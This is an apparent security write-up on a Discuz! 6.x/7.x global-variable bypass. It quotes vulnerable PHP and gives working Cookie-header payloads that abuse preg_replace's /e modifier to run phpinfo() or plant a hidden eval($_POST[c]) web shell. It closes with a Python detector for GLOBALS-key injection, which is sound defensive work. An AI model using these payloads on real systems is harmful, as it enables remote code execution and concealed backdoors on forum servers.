Discuz! front-end command execution in two product versions
Affected versions: Discuz! 6.x/7.x (global variable protection bypass vulnerability)
This has already been fairly public on the Internet; see: http://www.bkjia.com/Article/201005/47360.html
Description: Discuz! 6.x/7.x global variable defense bypass vulnerability. POC: missing.
Possibly because the author did not release a POC, it was not taken seriously by others.
This vulnerability can be exploited in many places, so the resulting command execution is not restricted.
The principle of the vulnerability is not covered here; this note only discusses its exploitation.
File:
include/discuzcode.func.php
function discuzcode($message, $smileyoff, $bbcodeoff, $htmlon = 0, $allowsmilies = 1, $allowbbcode = 1, $allowimgcode = 1, $allowhtml = 0, $jammer = 0, $parsetype = '0', $authorid = '0', $allowmediacode = '0', $pid = 0) {
    global $discuzcodes, $credits, $tid, $discuz_uid, $highlight, $maxsmilies, $db, $tablepre, $hideattach, $allowattachurl;

    if($parsetype != 1 && !$bbcodeoff && $allowbbcode && (strpos($message, '[/code]') || strpos($message, '[/CODE]')) !== FALSE) {
        $message = preg_replace("/\s?\[code\](.+?)\[\/code\]\s?/ies", "codedisp('\\1')", $message);
    }

    $msglower = strtolower($message);
    //$htmlon = $htmlon && $allowhtml ? 1 : 0;
    if(!$htmlon) {
        $message = $jammer ? preg_replace("/\r\n|\n|\r/e", "jammer()", dhtmlspecialchars($message)) : dhtmlspecialchars($message);
    }

    if(!$smileyoff && $allowsmilies && !empty($GLOBALS['_DCACHE']['smilies']) && is_array($GLOBALS['_DCACHE']['smilies'])) {
        if(!$discuzcodes['smiliesreplaced']) {
            foreach($GLOBALS['_DCACHE']['smilies']['replacearray'] AS $key => $smiley) {
                $GLOBALS['_DCACHE']['smilies']['replacearray'][$key] = '';
            }
            $discuzcodes['smiliesreplaced'] = 1;
        }
        $message = preg_replace($GLOBALS['_DCACHE']['smilies']['searcharray'], $GLOBALS['_DCACHE']['smilies']['replacearray'], $message, $maxsmilies);
    }
    // ... (excerpt ends here)
Note the third block, the smiley replacement line:
$message = preg_replace($GLOBALS['_DCACHE']['smilies']['searcharray'], $GLOBALS['_DCACHE']['smilies']['replacearray'], $message, $maxsmilies);
Both the search pattern and the replacement come from $GLOBALS['_DCACHE'], so if these two variables can be set from the request, the e modifier in the pattern makes preg_replace evaluate the replacement string as PHP code:
GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
The variables are carried in the Cookie header of the request:
GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=eval($_POST[c])%3B
In other words, a Trojan horse (web shell) can be hidden this way and is not easily discovered.
I tried Google to verify this and found that there are still a lot of tricks out there.
Solution:
Filter the request input.
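As an added example (not part of this write-up and not Discuz!'s own code), here is a request-side check for the filtering step: it looks for input names that would overwrite $GLOBALS in every source separately, including the Cookie header, rather than in one merged view of the request. The function names and the sample cookie values are my own; the sample values are constructed and harmless.

```python
import re
from urllib.parse import parse_qsl

# Input names that would land on PHP's $GLOBALS if a framework copies request
# input into global scope: "GLOBALS", "GLOBALS[_DCACHE]", "globals[x][y]", ...
# Leading whitespace is tolerated as a conservative choice.
GLOBALS_KEY = re.compile(r"^\s*GLOBALS(\[|$)", re.IGNORECASE)


def parse_cookie_header(header: str) -> dict:
    """Split a raw Cookie header into name -> value, keeping odd names intact."""
    out = {}
    for part in header.split(";"):
        if "=" in part:
            name, _, value = part.partition("=")
            out[name.strip()] = value.strip()
    return out


def tainting_keys(sources: dict) -> list:
    """Return (source, key) pairs whose key would overwrite $GLOBALS.

    `sources` maps a source name ('GET', 'POST', 'COOKIE', 'FILES') to its
    key/value dict. Every source is checked on its own, so a key that only
    arrives in the Cookie header is caught as well.
    """
    hits = []
    for src, params in sources.items():
        for key in params:
            if GLOBALS_KEY.match(key):
                hits.append((src, key))
    return hits


def request_is_tainted(query: str, body: str, cookie_header: str) -> bool:
    """True if the query string, form body or cookies carry a GLOBALS key."""
    sources = {
        "GET": dict(parse_qsl(query, keep_blank_values=True)),
        "POST": dict(parse_qsl(body, keep_blank_values=True)),
        "COOKIE": parse_cookie_header(cookie_header),
    }
    return bool(tainting_keys(sources))


if __name__ == "__main__":
    # Constructed sample: the GLOBALS key rides only in the Cookie header.
    cookie = "cdb_auth=abc; GLOBALS[_DCACHE][smilies][searcharray]=x"
    print(request_is_tainted("tid=1", "", cookie))  # True
    print(request_is_tainted("tid=1", "message=hi", "cdb_auth=abc"))  # False
```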